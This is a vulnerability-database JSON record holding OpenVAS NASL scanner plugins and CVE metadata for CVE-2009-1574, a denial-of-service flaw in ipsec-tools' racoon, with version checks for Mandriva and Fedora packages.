{"pluginID": "136141256231066364", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_112_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:112-1 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\nattackers to cause a denial of service (crash) via crafted fragmented\npackets without a payload, which triggers a NULL pointer dereference\n(CVE-2009-1574).\n\nUpdated packages are available that brings ipsec-tools to version\n0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\nbugfixes over the previous 0.7.1 version, and also corrects this\nissue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\npatched to address this issue.\n\nAdditionally the flex package required for building ipsec-tools has\nbeen fixed due to ipsec-tools build problems and is also available\nwith this update.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:112-1\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112-1.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66364\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1574\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:112-1 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.33~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "history": [], "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112-1.", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066364", "type": "openvas", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "919acb65976a818a55f5e5f4b53cce05"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "57d0da7ebfd1a939d6e087b8c4b28bf2"}, {"key": "href", "hash": "2781b2fe6d98da03b3dbe92479617da2"}, {"key": "modified", "hash": "4fb7fd6149697e74d091717ea3f1ca84"}, {"key": "naslFamily", "hash": "559385d24c9285e685f63d04129394ee"}, {"key": "pluginID", "hash": "f8b5e777f3eb2614f2d8ede9e25c8f77"}, {"key": "published", "hash": "198fb9cf6845fc1383069c7d4d253947"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b778055b37159119ce97e96620d4ff56"}, {"key": "sourceData", "hash": "1ed3c9c38d767a9f7873651c44e87be1"}, {"key": "title", "hash": "e84722bfea8129606c2bd958ce344fd7"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "viewCount": 0, "references": [], "lastseen": "2018-04-06T11:37:56", "published": "2009-12-10T00:00:00", "naslFamily": "Mandrake Local Security Checks", "objectVersion": "1.3", "cvelist": ["CVE-2009-1574"], "id": "OPENVAS:136141256231066364", "hash": "a788dad72fecfb09a1a59432c7ebe3be446879c4350385132addd3112ca03287", "modified": "2018-04-06T00:00:00", "title": "Mandriva Security Advisory MDVSA-2009:112-1 (ipsec-tools)", "edition": 1, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "bulletinFamily": "scanner", "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-04-06T11:37:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1574"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231064135", "OPENVAS:63992", "OPENVAS:1361412562310800708", "OPENVAS:136141256231063992", "OPENVAS:136141256231063994", "OPENVAS:63994", "OPENVAS:66364", "OPENVAS:800708", "OPENVAS:64135", "OPENVAS:136141256231064042"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2009-112.NASL", "FEDORA_2009-4291.NASL", "FEDORA_2009-4394.NASL", "FEDORA_2009-4298.NASL", "SUSE_11_0_NOVELL-IPSEC-TOOLS-090616.NASL", "REDHAT-RHSA-2009-1036.NASL", "UBUNTU_USN-785-1.NASL", "SUSE_NOVELL-IPSEC-TOOLS-6307.NASL", "SUSE_NOVELL-IPSEC-TOOLS-6306.NASL", "ORACLELINUX_ELSA-2009-1036.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21827", "SECURITYVULNS:VULN:9909"]}, {"type": "exploitdb", "idList": ["EDB-ID:8669"]}, {"type": "ubuntu", "idList": ["USN-785-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1804-1:C9FF1"]}, {"type": "redhat", "idList": ["RHSA-2009:1036"]}, {"type": "gentoo", "idList": ["GLSA-200905-03"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1036"]}, {"type": "centos", "idList": ["CESA-2009:1036"]}], "modified": "2018-04-06T11:37:56"}, "vulnersScore": 7.3}}

{"cve": [{"lastseen": "2019-05-29T18:09:58", "bulletinFamily": "NVD", "description": "racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote attackers to cause a denial of service (crash) via crafted fragmented packets without a payload, which triggers a NULL pointer dereference.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-1574", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1574", "published": "2009-05-06T17:30:00", "title": "CVE-2009-1574", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-07-25T10:56:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4298.", "modified": "2017-07-10T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63992", "id": "OPENVAS:63992", "title": "Fedora Core 10 FEDORA-2009-4298 (ipsec-tools)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_4298.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-4298 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nMinor version update from upstream fixing remote DoS.\nChangeLog:\n\n* Tue May 5 2009 Tomas Mraz - 0.7.2-1\n- Update to a new upstream version\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ipsec-tools' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-4298\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4298.\";\n\n\n\nif(description)\n{\n script_id(63992);\n script_cve_id(\"CVE-2009-1574\");\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-4298 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=497990\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools-debuginfo\", rpm:\"ipsec-tools-debuginfo~0.7.2~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:16", "bulletinFamily": "scanner", "description": "This host is installed with IPSec Tools for Linux and is prone\n to Denial of Service Vulnerability.", "modified": "2019-04-29T00:00:00", "published": "2009-05-13T00:00:00", "id": "OPENVAS:1361412562310800708", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800708", "title": "IPSec Tools Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IPSec Tools Denial of Service Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800708\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-05-13 10:01:19 +0200 (Wed, 13 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-1574\");\n script_name(\"IPSec Tools Denial of Service Vulnerability\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=497990\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2009/05/04/3\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2009/04/29/6\");\n\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_ipsec-tools_detect.nasl\");\n script_mandatory_keys(\"IPSec/Tools/Ver\");\n script_tag(name:\"affected\", value:\"IPsec Tools version prior to 0.7.2\");\n script_tag(name:\"insight\", value:\"This flaw is due to a NULL pointer dereference caused when the file\n 'racoon/isakmp_frag.c' processes fragmented packets without any payload.\");\n script_tag(name:\"solution\", value:\"Upgrade to the latest version 0.7.2.\");\n script_tag(name:\"summary\", value:\"This host is installed with IPSec Tools for Linux and is prone\n to Denial of Service Vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker cause denial if service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nipsecVer = get_kb_item(\"IPSec/Tools/Ver\");\nif(!ipsecVer)\n exit(0);\n\nif(version_is_less(version:ipsecVer, test_version:\"0.7.2\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-04-06T11:39:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064135", "id": "OPENVAS:136141256231064135", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:112 (ipsec-tools)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_112.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:112 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\nattackers to cause a denial of service (crash) via crafted fragmented\npackets without a payload, which triggers a NULL pointer dereference\n(CVE-2009-1574).\n\nUpdated packages are available that brings ipsec-tools to version\n0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\nbugfixes over the previous 0.7.1 version, and also corrects this\nissue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\npatched to address this issue.\n\nAdditionally the flex package required for building ipsec-tools has\nbeen fixed due to ipsec-tools build problems and is also available\nwith this update.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:112\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64135\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1574\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:112 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.33~3.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.35~2.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.35~3.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0-devel\", rpm:\"libipsec0-devel~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0-devel\", rpm:\"lib64ipsec0-devel~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:29", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4394.", "modified": "2018-04-06T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063994", "id": "OPENVAS:136141256231063994", "title": "Fedora Core 11 FEDORA-2009-4394 (ipsec-tools)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_4394.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-4394 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nMinor version update from upstream fixing remote DoS.\nChangeLog:\n\n* Tue May 5 2009 Tomas Mraz - 0.7.2-1\n- Update to a new upstream version\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ipsec-tools' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-4394\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4394.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63994\");\n script_cve_id(\"CVE-2009-1574\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-4394 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=497990\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools-debuginfo\", rpm:\"ipsec-tools-debuginfo~0.7.2~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4298.", "modified": "2018-04-06T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063992", "id": "OPENVAS:136141256231063992", "title": "Fedora Core 10 FEDORA-2009-4298 (ipsec-tools)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_4298.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-4298 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 